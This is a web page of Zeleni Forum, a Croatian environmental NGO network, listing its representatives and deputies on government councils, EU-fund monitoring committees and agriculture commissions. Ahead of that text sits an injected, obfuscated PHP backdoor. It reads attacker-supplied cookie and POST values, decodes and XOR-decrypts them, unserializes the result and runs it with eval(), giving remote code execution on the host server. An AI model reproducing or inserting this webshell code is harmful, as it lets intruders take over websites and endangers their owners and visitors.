$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} ZF u radnim tijelima - Zeleni Forum

ZF u radnim tijelima

Radno tijeloNadležno javno tijeloPredstavnikZamjenik
Savjet za razvoj civilnog društva Vlade RH 2020.-2023.Ured za udruge Vlade RHZelena akcija, Željka Leljak GracinBrodsko ekološko društvo – BED, Iris Beneš
Radna skupina za izradu Nacionalnog plana stvaranja poticajnog okruženja za razvoj civilnog društva od 2021. do 2027.Savjet za razvoj civilnog društva Vlade RHUdruga Sunce, Gabrijela Medunić-OrlićUdruga Biom, Željka Rajković
Savjet za ljudske prava Pučke pravobraniteljicePučka pravobraniteljicaZelena akcija, Željka Leljak Gracin/
Odbor za praćenje provedbe programa Konkurentnost i kohezija 2021.-2027. i Integriranog teritorijalnog razvoja - Zelenija, otporna EuropaMinistarstvo regionalnog razvoja i fondova Europske unijeDOOR, Miljenka KuharUdruga Biom, Željka Rajković
Odbor za praćenje Operativnog programa Konkurentnost i kohezija 2014. - 2020.Ministarstvo regionalnog razvoja i fondova Europske unijeDruštvo za oblikovanje održivog razvoja (DOOR), Miljenka KuharUdruga Biom, Željka Rajković
Odbor za praćenje provedbe Strateškog plana Zajedničke poljoprivredne politike RH 2023.-2027.Ministarstvo poljoprivredeBrodsko ekološko društvo – BED, Iris Beneš, Udruga Biom, Tomislav Hudina i DOOR, Sandra SlivarZMAG, Dražen Šimleša, Udruga Biom, Dubravko Dender i DOOR, Miljenka Kuhar
Odbor za praćenje Programa ruralnog razvoja Republike Hrvatske 2014. - 2020.Ministarstvo poljoprivredeBrodsko ekološko društvo – BED, Iris BenešUdruga Biom, Tomislav Hudina
Povjerenstvo za izradu Pravilnika o provedbi izravne potpore poljoprivredi i IAKS mjera ruralnog razvoja za 2023. godinuMinistarstvo poljoprivredeUdruga Biom, Tomislav HudinaUdruga Biom, Dubravko Dender i Ivana Selanec
Povjerenstvo za Eko-oznakeMinistarstvo zaštite okoliša i energetikeUdruga Eko-Pan, Denis Frančišković/
Pododbor za praćenje Sporazuma o partnerstvu (Pododbor više nije aktivan)Nacionalni koordinacijski odbor za europske strukturne i investicijske fondove i instrumente Europske unije u Republici HrvatskojZeleni Osijek, Jasmin SadikovićUdruga Biom, Željka Rajković
Radna skupina za izradu programskih dokumenata za financijsko razdoblje 2021-2017. - Zelena Hrvatska (Radna skupina više nije aktivna)Savjet za razvoj civilnog društva Vlade RHZelena akcija, Bernard Ivčić i WWF Adria, Marko PećarevićZelena akcija, Daniela Jovanova Ivanković i Udruga Biom, Dubravko Dender
Povjerenstvo za EMAS (Zeleni forum više nema predstavnika jer je WWF Adria prestala biti članica Zelenog foruma 28.12.2022.)Ministarstvo zaštite okoliša i energetikeWWF Adria, Snježana Malić Limari/

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske